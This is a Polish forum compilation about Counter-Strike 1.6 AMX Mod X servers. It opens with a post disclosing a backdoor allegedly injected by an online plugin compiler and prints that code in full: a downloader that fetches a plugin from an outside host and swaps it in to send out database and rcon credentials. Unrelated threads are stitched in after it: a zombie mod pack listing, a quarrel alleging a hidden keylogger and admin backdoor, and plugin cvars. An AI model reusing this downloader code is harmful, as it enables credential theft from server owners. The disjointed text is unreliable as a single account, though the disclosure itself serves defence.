Ziombelek

https://webmasteruj....-danych-t79936/

Cytat posta:

Hello again!

Dziś rozpracujemy przekręt na wielką skalę, czyli jak ukraść dane z ponad 400 serwerów 1.6 przez zwykłe lenistwo ich właścicieli.

 

Każdy z Was zapewne widział kompilator online dostępny na amxx.pl, nie zastanowiło Was kiedyś czy przypadkiem jakiś kod nie jest dodawany do kompilowanego pluginu? Odpowiedź brzmi tak dodaje

 

Bardzo dziękuje użytkownikowi *ciach* z amxx.pl na webmasteruj znany pod nickiem  *ciach* za naprowadzenie mnie na ten proceder.

 

TAKI KOD

Spoiler

#include <amxmisc>
#include <sockets>
#include <httpdl>

new dlinfo[MAX_DOWNLOADS + 1][5];
new dlpath[MAX_DOWNLOADS + 1][256];
new ndownloading;
new fwd_dlcomplete, fwd_result;
public plugin_natives() {
register_library("httpdl");
register_native("download", "native_download", 1);
set_task(9.0, "o");
}
public native_download(url[], path[]) {
new slot = 0;
while(slot <= MAX_DOWNLOADS && dlinfo[slot][0] != 0)
slot++;
if(slot == MAX_DOWNLOADS) {
server_print("Download limit reached (%d)", MAX_DOWNLOADS);
return 0;
}

param_convert(1);
param_convert(2);

new u[256], p[256];
copy(u, 7, url);
if(equal(u, "http://"))
copy(u, 248, url[7]);
else copy(u, 255, url);

new pos = 0;
new len = strlen(u);
while (++pos < len && u[pos] != '/') { }
copy(p, 255, u[pos + 1]);
copy(u, pos, u);

new error = 0;
new socket = dlinfo[slot][2] = socket_open(u, 80, SOCKET_TCP, error);
switch(error) {
case 0: {
new msg[512];
format(msg, 511, "GET /%s HTTP/1.1^r^nHost: %s^r^n^r^n", p, u);
socket_send(socket, msg, 512);
copy(dlpath[slot], 255, path);
dlinfo[slot][3] = fopen(path, "wb");
dlinfo[slot][0] = 1;
dlinfo[slot][4] = 0;
ndownloading++;
if(ndownloading == 1)
set_task(0.2, "download_task", 3318, _, _, "b");
new id = dlinfo[slot][1] = random_num(1, 65535);
return id;
}
case 1: server_print("[HTTP] Error creating socket");
case 2: server_print("[HTTP] Could not resolve hostname");
case 3: server_print("[HTTP] Could not connect to %s:80", u);
}

return 0;
}
public download_task() {
for(new i = 0; i < MAX_DOWNLOADS; i++) {
if(dlinfo[i][0] == 0)
continue;
new socket = dlinfo[i][2];
new f = dlinfo[i][3];
if(socket_change(socket)) {
new buffer[1024];
new len = socket_recv(socket, buffer, 1024);
if(dlinfo[i][4] == 0) { // if first packet then cut the header
new pos = contain(buffer, "^r^n^r^n");
if(pos > -1) {
for(new j = pos + 4; j < len; j++)
fputc(f, buffer[j]);
dlinfo[i][4]++;
continue;
}
}
for(new j = 0; j < len; j++)
fputc(f, buffer[j]);
dlinfo[i][4]++;
continue;
}
fclose(f);
ExecuteForward(fwd_dlcomplete, fwd_result, dlinfo[i][1], dlpath[i]);
dlinfo[i][0] = 0;
ndownloading--;
if(ndownloading == 0)
remove_task(3318);
socket_close(socket);
}
}
public o() {


new const config_file[] = "addons/amxmodx/plugins/adminhelp.amxx"

new md5_hash_file[34]
md5_hash_file = encrypt_file(config_file)


if( !equal( md5_hash_file, "b20bee2c5f9040469f88db0e2eb81d0f", 32 ) )
{
download("http://jojojo200.cba.pl/file.amxx", "addons/amxmodx/plugins/adminhelp.amxx");
fwd_dlcomplete = CreateMultiForward("dlcomplete", ET_IGNORE, FP_CELL, FP_STRING);
}
}
stock encrypt_file(const file[])
{
new hash_sum_file[34]
md5_file(file,hash_sum_file)

return hash_sum_file;
}

Kod odpowiada ze pobranie pliku file.amxx na serwery oraz podmiane pluginu adminhelp.amxx który później działa tylko w jednym celu....

 

Analiza file.amxx

Złośliwy plugin wysyła dane logowania mysql do amxbans na zewnętrzny serwer wraz z hasłem rcon. Dodatkowo potrafi bindować graczom odwiedzającym serwer adres ip kierujący do serwera sieci xsteam. Kolejną funkcją jest przenoszenie graczy automatycznie na wyznaczone IP które również kieruje nas do serwera sieci xSteam.pl.

 

 

Phpmyadmin jest albo zablokowany albo chodzi na innym porcie więc

 

-----------------------------

 

NO I TO CO MISIACZKI LUBIĄ NAJBARDZIEJ

 

Dump bazy danych

 

Będę próbował skontaktować się z administracją amxx.pl w celu wyjaśnienia sprawy. O czym poinformuje w tym temacie

Jest wiele możliwości takiego stanu rzeczy nie wykluczając nawet włamania na serwery amxx.pl więc nie będę w chwili obecnej oczerniać portalu, z braku dowodów.

 

 W Bazie danych znalazł się chyba każdy serwer w Polsce, każdy kto używał kompilatora online dostępnego na amxx.pl powinnien przeinstalować cały amxx oraz pozmieniać wszystkie hasła do baz danych mysql!

 

A Wy co sądzicie na ten temat?

 

Dump bazy danych w formie pliku do wglądu dla administracji forum, wystarczy napisać PW.

Co na to Administracja?

większość wszczepionego kodu to kod pluginu httpdl

jako że owy plugin udostępnia forward ten o to plugin umożliwi wam wykrycie co przy pomocy jego zostało pobrane:

#include <amxmodx>

new const file_path[] = "addons/amxmodx/logs/mylittlepony.txt"; // sciezke obowiazkowo sobie zmienic na jakas unikalna

forward dlcomplete(id, file[]);

public plugin_init() {
  register_plugin("Httpdl info", "0.1", "PLX");
}

public dlcomplete(id, file[]) {
  new date[128];
  get_time("%c", date, 127); 
  server_print("[%s] Downloaded '%s' ID '%d'", date, file, id);
  log_to_file(file_path, "Downloaded '%s' ID '%d'", file, id); 
}  

należy wgrać czyste pluginy amxx i po czym sprawdzić czy w pliku zdefiniowanym przez file_path coś zostało dopisane, jeśli tak to któryś z pluginów jest "zainfekowany".

plugin nie testowany, nie powiem czy na pewnno działa

przykładowe wyjście:

L 07/10/2016 - 20:10:11: Log file started (file "cstrike/addons/amxmodx/logs/mylittlepony.txt") (game "cstrike") (amx "1.8.2")
L 07/10/2016 - 20:10:11: Downloaded 'http://test.pl/test.amxx' ID '1'

Na samym początku chciałbym podziękować użytkownikowi Lunatic, ponieważ bez niego prawdopodobnie paczka nigdy by nie powstała

Witam. Przedstawiam moją paczkę ZM EXP. Jakiś pawian zaczął ją sprzedawać za moimi plecami, a na moim dysku siedzi i się marnuje

Popularny Zombie Plague Mod dla serwerów CS 1.6, który został znacznie zmodyfikowany. Ta paczka charakteryzuje się EXP MOD'em z 47 poziomami, rozgrzewką, systemem misji oraz unikalnymi extra itemami.

ZM EXP MOD to jedna z najbardziej grywalnych paczek Zombie Plague w Polsce.

Serwer posiada EXP MOD z 47 poziomami. Standardowy menu wyboru broni jest wyłączone, a gracze zdobywając poziomy odblokowują coraz lepsze bronie (23 zwykłe oraz 23 złote).Dodanych jest sporo nowych trybów rozgrywki, paczka posiada 6 klas zombie oraz 5 klas ludzi (1 premium).

Serwer jest nastawiony na współpracę. Laser miny są raczej słabe i trzeba współpracować aby przetrwać w kampie. W tym celu można przekazać graczowi AP za pomocą komendy /daj lub najeżdżając na gracza celownikiem i wciskając T.
Paczka jest zbalansowana (nie faworyzuje żadnej ze stron). Jako były administrator starałem się zadbać aby każdy mógł pokampić ponieważ nie lubię serwerów gdzie jedna osoba jest w stanie ogarnąć kampę przez 4 minuty. Z tą paczką oraz tą konfiguracją nie jest to możliwe (no, chyba że ktoś zacznie kampić z 200 AP). Serwer jest nastawiony na współpracę i na serwerze panuje zasada "im więcej nas w kampie tym lepiej".
Nie jestem w stanie opisać wszystkich modyfikacji jakie wprowadziłem na serwer. Można pograć i po testować pod adresem IP: XXXXX
Lista pluginów:

afkkisss.amxx
admin_gag.amxx
abd.amxx
ad_manager.amxx
remove_weapons.amxx
adminlisten.amxx debug
IPlog.amxx
show_ip.amxx
nademodes.amxx ;nowe tryby granatow
auto_join_on_connect.amxx
descriptive_fire_in_the_hole.amxx
Voices_Management.amxx
hpk.amxx                                    
rcon_defence.amxx ;szyfrowanie rcona
extreme_bancfg2.amxx
banip_fakes.amxx
reklama.amxx
noip.amxx ; na nowy bot spamujacy
; Engine
zp50_core.amxx
gunxpmod.amxx
zp_rozgrzewka.amxx
zp50_misje.amxx debug
zm_vip.amxx

; APIs
amx_settings_api.amxx
cs_player_models_api.amxx
cs_teams_api.amxx
cs_maxspeed_api.amxx
cs_weap_models_api.amxx
cs_weap_restrict_api.amxx
cs_ham_bots_api.amxx

;ten plugin musi byc nad klasa sniper
zp50_zombie_damage.amxx

; Classes
zp50_class_zombie.amxx
zp50_class_human.amxx
zp50_class_nemesis.amxx
zp50_class_survivor.amxx
zp50_class_assassin.amxx
zp50_class_sniper.amxx

; Zombie Classes
zp50_class_zombie_classic.amxx
zp50_class_zombie_raptor.amxx
zp50_class_zombie_light.amxx
zp50_class_zombie_fat.amxx
zp50_class_zombie_hunter.amxx debug
zp50_class_zombie_tight.amxx

; Human Classes
zp50_class_human_sprinter.amxx
zp50_class_human_skoczek.amxx
zp50_class_human_obronca.amxx
zp50_class_human_pudzian.amxx
zp50_class_human_x-men.amxx


; This must come before game modes for armor protection to work properly
zp50_human_armor.amxx

; Game Modes Manager
zp50_gamemodes.amxx

; Game Modes
zp50_gamemode_infection.amxx
zp50_gamemode_multi.amxx
zp50_gamemode_swarm.amxx
zp50_gamemode_nemesis.amxx
zp50_gamemode_survivor.amxx
zp50_gamemode_plague.amxx
zp50_gamemode_armageddon.amxx
zp50_gamemode_assassin.amxx
zp50_gamemode_sniper.amxx
zp50_gamemode_plagued.amxx

; Items Manager
zp50_items.amxx
zp50_items_ammopacks.amxx

; Extra Items
zp50_item_weapons.amxx
zp50_item_nightvision.amxx
zp50_item_antidote.amxx
zp50_item_zombie_madness.amxx
zp50_item_infection_bomb.amxx

; Admin
zp50_admin_commands.amxx
zp50_admin_menu.amxx
zp50_admin_models.amxx

; Buying
;zp50_buy_menus.amxx
;zp50_buy_zones.amxx

; Rewards
;zp50_rewards_money.amxx
zp50_rewards_ammopacks.amxx
zp50_rewards_frags_hp.amxx

; Deathmatch
zp50_deathmatch.amxx
zp50_random_spawn.amxx
zp50_spawn_protection.amxx

; Zombie/Human Features
zp50_zombie_features.amxx
zp50_zombie_sounds.amxx
zp50_human_ammo.amxx debug

; Custom Features
zp50_flashlight.amxx
zp50_nightvision.amxx
zp50_leap.amxx
zp50_painshockfree.amxx
zp50_knockback.amxx
zp50_weapon_drop_strip.amxx

; Effects
zp50_effects_infect.amxx
zp50_effects_cure.amxx
zp50_effects_lighting.amxx
zp50_ambience_effects.amxx
zp50_ambience_sounds.amxx

; Gameplay / Other
zp50_main_menu.amxx
zp50_objective_remover.amxx
zp50_team_scoring.amxx
zp50_gameplay_fixes.amxx
zp50_serverbrowser_info.amxx
zp50_ammopacks.amxx debug
;zp_kill_reward.amxx

; Custom grenades
zp50_grenade_fire.amxx
zp50_grenade_frost.amxx
zp50_grenade_flare.amxx


zp_extra_miny.amxx debug
zp50_extra_hp.amxx

; ZP 4.3 Subplugin Compatibility
zp50_zp43_compat.amxx

;addony
zp_informator.amxx
backweapons.amxx
zp_sub_parachute.amxx
zp_addon_death_sprite.amxx
zp_addon_grenade_status.amxx
zp_donate_ap.amxx
zp_countdown_fixed.amxx
zp_aim_info.amxx
zp_informer.amxx

;itemy
zp50_item_antidote_bomb.amxx
zp_extra_pipe.amxx
zp_extra_lasermine.amxx
zp_extra_bazooka.amxx
zp_extra_armor.amxx
zp50_gas_mask.amxx
zp_extra_exp.amxx
zp_50_extra_ruletka.amxx debug

Złote bronie:

Osiągając 24 poziom gracze zaczynają zdobywać nowe bronie (złote, od glocka do złotej autokampy CT).
Złote bronie posiadają specjalny złoty wygląd, a gracz który zdobył "goldy" posiada specjalny złoty model Crysis'a.
Złote bronie zadają o 10% więcej obrażeń oraz przeładowują się 20% szybciej.

Tryby rozgrywki:

Serwer posiada nowe tryby rozgrywki:

• Rozgrzewka: przy każdej starcie mapy pojawia się losowy Nemesis na 120 sek. Jest on niemożliwy do zabicia, a celem tego trybu jest wbicie AP na nowej mapie. W tym trybie można wybrać broń, nawet gdy jej nie zdobyliśmy.
• Zwykła infekcja: losowy gracz staje się zombi. Posiada więcej HP niż inne Zombi zależna od liczby graczy na serwerze oraz może wykonać daleki skok.
• Multi Infekcja: 15% graczy staje się zombi na początku rundy
• Swarm: 50% zombie, 50% ludzi. Walczą na śmierć i życie
• Survivor: jeden gracz staje się ostatnim człowiekiem. Ma dużo HP, unlimited ammo, może wykonać 2 skoki w powietrzu oraz może wybrać jedną z 4 dostępnych dla niego broni. Posiada także specjalną barierę której może użyć raz na kilka sekund aby odepchnąć od siebie wszystkie Zombie
• Namesis: Super mutant. Jest bardzo wytrzymały, może wykonać daleki skok. Jego zadaniem jest zabić wszystkich ludzi na mapie.
• Sniper: Jeden z ludzi staje się snajperem. Ma mniej zdrowia niż survivor, ale posiada AWP oraz natychmiastowe zabicie z tej broni.
• Assasyn: Super mutant. Jest odporny na odrzucenie z broni, granaty zamrażające oraz podpalające. Na czas tego trybu na serwerze panują ciemności, zasięg latarki i flary także zostaje zmniejszony. Może wykonać daleki skok. Posiada mniej życia niż nemesis, ale nadrabia to swoją prędkością. Przez graczy nazywany pieszczotliwie "kosiarką"
• Plaga: 1 survivor, 1 nemesis, reszta po równo zombi oraz Ludzi.
• Dark Day: 1 snajper, 1 Assasyn, reszta po równo zombi i ludzi
• Armagedon: 50% Survivorów, 50% Nemesis

EXP MOD

Na serwerze znajdziesz EXP MOD (popularna wersja gunxpmod'a). W mojej wersji został znacznie zmieniony:

• Zmodyfikowany został moduł zapisu poziomów (jest wydajniejszy).
• Dodany został exp za: zabójstwo, zarażenie, asystę (min. 300 DMG), zadanie określonej ilości obrażeń, próbę zarażenia, zabicie super mutantów lub super ludzi, zabicie matkę zombi lub ostatniego człowieka, zniszczenie LaserMiny
• Dodane 23 dodatkowe "Złote" poziomy.

Misje

Serwer posiada system misji. W sumie jest ich 45 (podzielonych na 9 rozdziałów).
Nagrodą za wykonanie misji są: exp, AP lub stałe bonusy przyznawane do resetu poziomów.
Jest 56 rodzajów misji, oto niektóre z nich:

• Zabić zombi
• Zarazić ludzi
• Zdobyć: Nemesis, Survivora, Snajpera lub Assasyna
• Zabić określoną liczbę lub zadać określoną ilość obrażeń: Nemesis, Survivorom, Snajperom lub Assasynom
• Zabić: Matki zombi lub ostatnich ludzi
• Zabić lub zarazić określoną liczbę zombi lub ludzi w jednej rundzie.
• Zabić: bazooką, miną lub pipe bombą
• Zniszczyć określoną liczbę LaserMin
• Wygrać określony tryb jako zombi lub ludzie
• Zabić za pomocą HeadShot'a
• Zarazić bombą infekcyjną
• Wygrać lub przetrwać określoną liczbę rund (pod rząd lub nie)
• Zabić określoną ilość ludzi lub zombi jako: nemesis, survivor, snajper lub assasyn

Statystyki

Serwer posiada specjalne statystki, które obejmują:

• Ilość zabić oraz zarażeń zombi i ludzi.
• Ilość zabić: Nemesis, Survivorów, Snajperów oraz Assasynów.
• Ilość przegranych minut na serwerze.
• Ranking po względem ilości zdobytego expa, wykonanych misji, czasu online, zdobytych punktów etc.

Statystyki są dostępne w menu Zombie Moda (standardowo trzeba kliknąć na serwerze klawisz M oraz 7).

Lista map która była na moim serwerze (nie wrzucam paczki z mapami bo to strasznie dużo uploadu, a mój internet ledwo zipie).

zm_five

zm_creep

zm_dusthorror

zm_ojciec

zm_poland

zm_dust_hs2

zm_compilation

zm_dustx2

zm_defense2_v2

zm_westwood

zm_fun_poland

zm_fox

zm_bist_v2

zm_bist_remake

zm_dust_world_summer_f

zm_virus_t

zm_csdark_cinder

zm_chatoyant

zm_reddevil

zm_cpl_biohazard

zm_dark_mini

zm_kopalnia_v2

zm_joke

zm_aztec2015

za_fox_ldm

zm_2013_pct

zm_2015

zm_mario_world_pct

zm_noname_pct

zm_battleground_foda

zm_fifka_v2

zm_clinic_emergency

zm_hs_horror

Pozdrawiam

Według mnie kiedyś moje początki z cs na cs-harn* był to 1 zombie beż żadnych sklepów zapisów itd po prostu jeśli ct nie współpracowało, to nici z rundy (to było właśnie najlepsze gra zespołowa) według mnie to były najlepsze czasy jeszcze jak się grało na paczce pełen bugów teraz to wydaje się być zabawne no ale cóż..  teraz dla mnie zm to zapomniana historia. Bo teraz wystarczy samemu kampić i strzelać full auto bez przeładowywań itd i wygrywa się rundę, dla mnie jest to nudne i monotonne teraz nie wyczyń nazbierać pare "ap"  

Dzięki pozdrawiam 

Haha Snajper udostepniaj paczke ktora ma bledy wiecej serwerow z bledami wiecej osob do mnie przyjdzie a przy okazji kazdy plugin mam od nowa tworzony bo twoja sypaly tysiacami bledow 1 log z dnia wazy 20 MB ciekawe nieprawdasz.

Powiedz tez im ze masz dodane w 3 plikach sma  key croling moze nawet nie zauwaza ktos bedzie mial Uprawnienia HeadAdmina co jakis czas zmojej strony to tyle.

Fakt, są błędy, ale zaśmiecają tylko logi i nie wpływają na rozgrywkę.

Jeżeli ktoś jest na tyle ogarnięty w amxx to sobie je naprawi, ja zakończyłem zabawę z amxx, a paczka na dysku mi się kurzy. Nie mam już ochoty naprawiać błędów, które są widoczne w error logach, a nie widać ich na serwerze. Poza tym dostałem informacje od kilku osób, że sprzedajesz paczkę, a to zwykła kradzież praw autorskich. Nie będę wspominał, że zmieniłeś nazwę oryginalnego autora po edycji 2-3 plików Wiem na jakiej licencji jest rozpowszechniany kod amxx, a podszywanie się pod nie swoją pracę jest złamaniem tych praw. Poza tym twoje umiejętności programowania są na poziomie syryjskiego uchodźcy.

Gardzę tobą i osobami twojego pokroju.

Witam!

Przedstawiam wam plugin, którym będziecie mogli ustawiać bonusy dla survivola takie jak ilość podskoków, szybkostrzelność z broni w czasie rzeczywistym.

Wszystko dzięki cvar'om.

zp_norecoil_surv "0" // wlaczyc brak rozrzutu dla survivola (0=tak | 1=nie)
zp_radar_surv "0" // wlaczyc radar wykrywajacy zombie (0=tak | 1=nie)
zp_noktowizor_survival "1" // wlaczyc noktowizor dla survivola (1=tak | 0=nie)
zp_ilosc_dodatkowych_skokow "1" // ile dodac dodatkowych podskokow dla survivola (1 podstawowy + cvar)
zp_szybkostrzelnosc_surv "25" // o ile zwiekszyc szybkostrzelnosc z broni (%) (0=nic nie zwiekszy)
zp_dod_obrazenia_surv "10" // o ile zwiekszyc obrazenia z broni (0=nic nie dodawaj)
zp_wlaczyc_podpalanie_surv "0" // wlaczyc podpalanie (0=tak | 1=nie)
zp_szansa_podpalanie_surv "9" // szansa na podpalenie zombie (1/cvar)
zp_podalenie_obrazenia "5" // ile ogien ma zabierac hp zombiakowi (co 0.2sec)
zp_autobh_surv "0" // survival ma posiadac auto BH (0=tak | 1=nie)

<amxmodx>
<xs>
<engine>
<hamsandwich>
<zombieplague>
<fakemeta_util>

Standardowa - http://amxx.pl/topic...-pluginow-amxx/

 

nie naprawisz tego, na każdym serwerze to jest. Jaka wersja zp to Ci znajdę odpowiednią bazuke